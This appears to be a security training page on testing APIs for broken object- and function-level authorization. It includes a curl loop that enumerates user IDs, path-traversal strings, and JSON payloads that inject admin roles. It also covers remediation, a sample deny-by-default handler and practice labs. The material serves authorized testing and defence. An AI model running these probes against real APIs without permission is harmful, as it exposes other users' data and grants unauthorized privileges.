API Security
Intermediate
API1 API5

Authorization Testing

Authorization flaws are the most common and critical API vulnerabilities. They occur when the API fails to verify if the authenticated user has permission to access the requested resource or function.

BOLA - Broken Object Level Authorization

BOLA occurs when an API doesn't verify if the user has permission to access a specific object (like a user record, order, or document) based on the ID provided in the request.

1. Identify Endpoints with IDs

Look for endpoints that take an ID as a parameter.

http
GET /api/users/1001
GET /api/orders/5001
GET /api/documents/doc-abc

2. Change IDs

Try changing the ID to access another user's data.

http
GET /api/users/1002
GET /api/orders/5002
GET /api/documents/doc-xyz

3. Test Different ID Formats

Sometimes APIs support multiple ID formats.

http
GET /api/users/1             # Sequential integer
GET /api/users/00001         # Padded integer
GET /api/users/user-uuid-here # UUID
GET /api/users/admin         # Username as ID
GET /api/users/user@email.com # Email as ID

4. ID Enumeration

Script the enumeration of IDs to find valid objects.

bash
for id in {1..1000}; do
  response=$(curl -s -H "Authorization: Bearer $TOKEN" \
    https://api.target.com/api/users/$id)
  if [[ $response != *"not found"* ]]; then
    echo "Found: $id"
    echo "$response"
  fi
done

5. Test All CRUD Operations

Don't just test GET requests. Try to modify or delete other users' data.

http
GET    /api/users/1002
PUT    /api/users/1002
DELETE /api/users/1002
PATCH  /api/users/1002

BFLA - Broken Function Level Authorization

BFLA occurs when an API doesn't verify if the user has permission to access a specific function (like an admin endpoint).

1. Identify Privileged Endpoints

Look for endpoints that suggest administrative functionality.

  • /api/admin/users
  • /api/admin/config
  • /api/admin/logs
  • /api/internal/debug
  • /api/management/settings
  • /api/v1/admin/export

2. Access with Low Privileges

Try to access these endpoints with a regular user token.

bash
curl -H "Authorization: Bearer $USER_TOKEN" \
  https://api.target.com/api/admin/users

3. HTTP Method Manipulation

If GET is blocked, try other methods like POST or PUT.

bash
curl -X POST -H "Authorization: Bearer $USER_TOKEN" \
  https://api.target.com/api/admin/users

4. Path Manipulation

Try to bypass filters by manipulating the URL path.

  • /api/users/../admin/config
  • /api/v1/users/../../admin/users
  • /api/ADMIN/users
  • /api/Admin/users

5. Parameter-Based Escalation

Try to inject parameters that might elevate privileges.

http
POST /api/users
Content-Type: application/json

{"name": "test", "role": "admin"}

Other common payloads:

json
{"name": "test", "isAdmin": true}
{"name": "test", "permissions": ["admin", "write", "delete"]}

6. Role/Permission Changes

Try to update your own role or permissions.

http
PUT /api/users/1001
Content-Type: application/json

{"role": "admin"}

Remediation

Defense Strategies

  • Implement a consistent authorization mechanism that validates the user's permission for every requested function and object.
  • Use random, unpredictable IDs (UUIDs) instead of sequential integers to make enumeration impractical; this is defence in depth and does not replace the per-object authorization check.
  • Check authorization in the business logic layer, not just at the API gateway.
  • Write unit tests to verify that unauthorized users cannot access privileged endpoints.

BOLA Is the #1 API Vulnerability

BOLA (aka IDOR) consistently tops the OWASP API list because logic flaws are not caught by scanners. Always test with two accounts at the same privilege level — swap IDs and object references between them. Automated tools miss most BOLA because they don't understand business context.
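The consistent, deny-by-default check that the remediation list and the two-account rule above describe, as an added example that is not part of the original page: a hypothetical in-memory request handler over constructed sample users. It applies the function-level rule by route (whatever the HTTP method, after path normalisation and case folding), the object-level rule by ownership with the authorization decision taken before the object lookup, and refuses role, isAdmin and permissions in request bodies. USERS, normalize and handle are names assumed here.

```python
import posixpath
from dataclasses import dataclass, field

# Constructed sample store (hypothetical data): two ordinary users and one admin.
USERS = {1001: {"name": "alice", "role": "user"},
         1002: {"name": "bob", "role": "user"},
         1: {"name": "root", "role": "admin"}}
# Server-assigned fields a request body may never set (blocks role/isAdmin injection).
PROTECTED_FIELDS = {"role", "isAdmin", "permissions"}
PRIVILEGED_PREFIXES = {"admin", "internal", "management"}

@dataclass
class Response:
    status: int
    body: dict = field(default_factory=dict)

def normalize(path: str) -> str:
    # Resolve ../ segments and fold case so /api/users/../admin/users and
    # /api/ADMIN/users hit the same rule as /api/admin/users.
    return posixpath.normpath(path).lower()

def handle(caller_id: int, method: str, path: str, body=None) -> Response:
    caller = USERS[caller_id]          # caller is already authenticated
    parts = normalize(path).strip("/").split("/")
    body = body or {}
    if len(parts) < 2 or parts[0] != "api":
        return Response(404)
    # Function-level (BFLA) rule keyed on the route, independent of HTTP method.
    if parts[1] in PRIVILEGED_PREFIXES:
        if caller["role"] != "admin":
            return Response(403)
        return Response(200, {"users": sorted(USERS)})
    # Object-level (BOLA) rule for /api/users/{id}: authorize before the lookup,
    # so a non-admin gets 403 for every foreign id and learns nothing about which exist.
    if parts[1] == "users" and len(parts) == 3:
        target = int(parts[2]) if parts[2].isdigit() else None   # "00001" -> 1
        if target != caller_id and caller["role"] != "admin":
            return Response(403)
        if target not in USERS:
            return Response(404)
        if method == "GET":
            return Response(200, dict(USERS[target]))
        if method in {"PUT", "PATCH"}:
            if PROTECTED_FIELDS.intersection(body):
                return Response(400, {"error": "field not writable"})
            USERS[target].update(body)
            return Response(200, dict(USERS[target]))
        return Response(403)           # DELETE and anything else: not granted here
    return Response(404)
```

The two-account swap from the note above is exactly what a unit test against this handler should exercise: alice (1001) and bob (1002) each requesting the other's record, every method, must get 403.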

Authorization Testing Practice

Exploit BOLA and BFLA vulnerabilities in purpose-built vulnerable API environments.

  • vAPI — BOLA/IDOR Challenges (Custom Lab, medium): object ID manipulation, horizontal privilege escalation, UUID enumeration
  • crAPI — BFLA Admin Functions (Custom Lab, medium): HTTP method tampering, admin endpoint access, role parameter injection